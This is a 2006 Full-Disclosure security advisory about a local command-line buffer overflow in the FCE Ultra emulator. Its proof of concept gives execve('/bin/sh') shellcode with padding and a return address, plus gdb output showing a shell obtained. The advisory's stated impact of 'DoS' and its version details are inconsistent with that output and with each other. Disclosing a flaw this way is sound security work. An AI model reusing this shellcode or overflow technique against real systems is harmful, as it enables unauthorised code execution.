FCE Ultra buffer overflow, yet another local exploit without any fancy stuff.

["KaiJern, Lau" <xwings () xwings net>]

=== FILE START ===

[xwings.net / security.net.my] Security Advisory :

FCE Ultra buffer overflow,
yet another local exploit without any fancy stuff.

[xwings.net / security.net.my] Security Advisory 07 August 2006

BACKGROUND:
===========

FCE Ultra is a NES (Nintendo Entertainment System) and Famicom (Family 
Computer) emulator
for a variety of different platforms, based on Bero's FCE. Game compatibility 
is very high,
provided you provide non-corrupt ROM/disk images.

It has been tested (and runs) under DOS, Linux SVGAlib, Linux X, Mac OS X, and 
MS Windows.
A native GUI is provided for the MS Windows port, and the other ports use a 
command-line
based interface. However, GNOME users can optionally use the GNOME front-end.
The SDL port should run on any modern UNIX-like operating system(such as 
FreeBSD) with no code changes.

SOFTWARE:
=========

FCE Ultra (fceu) <= 0.98.13
http://fceultra.sourceforge.net/

TESTED:
=======

FreeBSD 6.1
Kubuntu 6.06

CRITICAL:
=========

Very Low

IMPACT:
=======

DoS

WHERE:
======

From Local


DESCRIPTION:
============

Well .....

xwings@montana:[~]$ fceu

Starting FCE Ultra 0.98.13...

Usage is as follows:
fceu <options> filename

Almost all the argv are exploitable.


POC:
====


xwings@montana:[~]$ gdb -q fceu
(no debugging symbols found)...(gdb)
(gdb) r -fs `ruby -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69 
\
\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";print "E" * 
2029;print "\x28\xe4\xbf\xbf"'`

Starting program: /usr/X11R6/bin/fceu -fs 
`ruby -e 'print "\x31\xc0\x50\x68\x2f \
\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80"; \
print "E" * 2029;print "\x28\xe4\xbf\xbf"'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...warning:
Unable to get location for thread creation breakpoint: generic error [New LWP 
100164]
(no debugging symbols found)...(no debugging symbols found)...(no debugging 
symbols found)
...(no debugging symbols found)...(no debugging symbols found)...(no debugging 
symbols found)
...(no debugging symbols found)...(no debugging symbols found)...(no debugging 
symbols found)
...(no debugging symbols found)...

Starting FCE Ultra 0.98.13...
[New Thread 0x820c000 (LWP 100164)]
(no debugging symbols found)...(no debugging symbols found)...(no debugging 
symbols found)...
(no debugging symbols found)...Loading 1?h//shh/bin??TSP??EEE
.. (CUT) ..
.. (CUT) ..
.. (CUT) ..
EEE(�..

$ uname -a
FreeBSD montana.xwings.net 6.1-STABLE FreeBSD 6.1-STABLE #8: Mon Jul 31 
14:14:12 MYT 2006

DETECTION:
==========

[xwings.net / security.net.my] has confirmed this vulnerability on FCE Ultra 
0.98.1 and below.
All previous versions are suspected vulnerable to this issue.


VI. VENDOR RESPONSE

nothing at the moment

VIII. DISCLOSURE TIMELINE

7th August 2006, Initial vendor notification


IX. CREDIT

Bug Founder : KaiJern, Lau
Email : xwings <at> xwings <dot> net

Thanks to all the folks @ pulltheplug.org.


== EOF ===


-- 
--

Regards,
KaiJern, Lau

==

All good things ...
come by grace, and grace come by art, and art does not come easy.

** From : xwings @ xwings . net

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/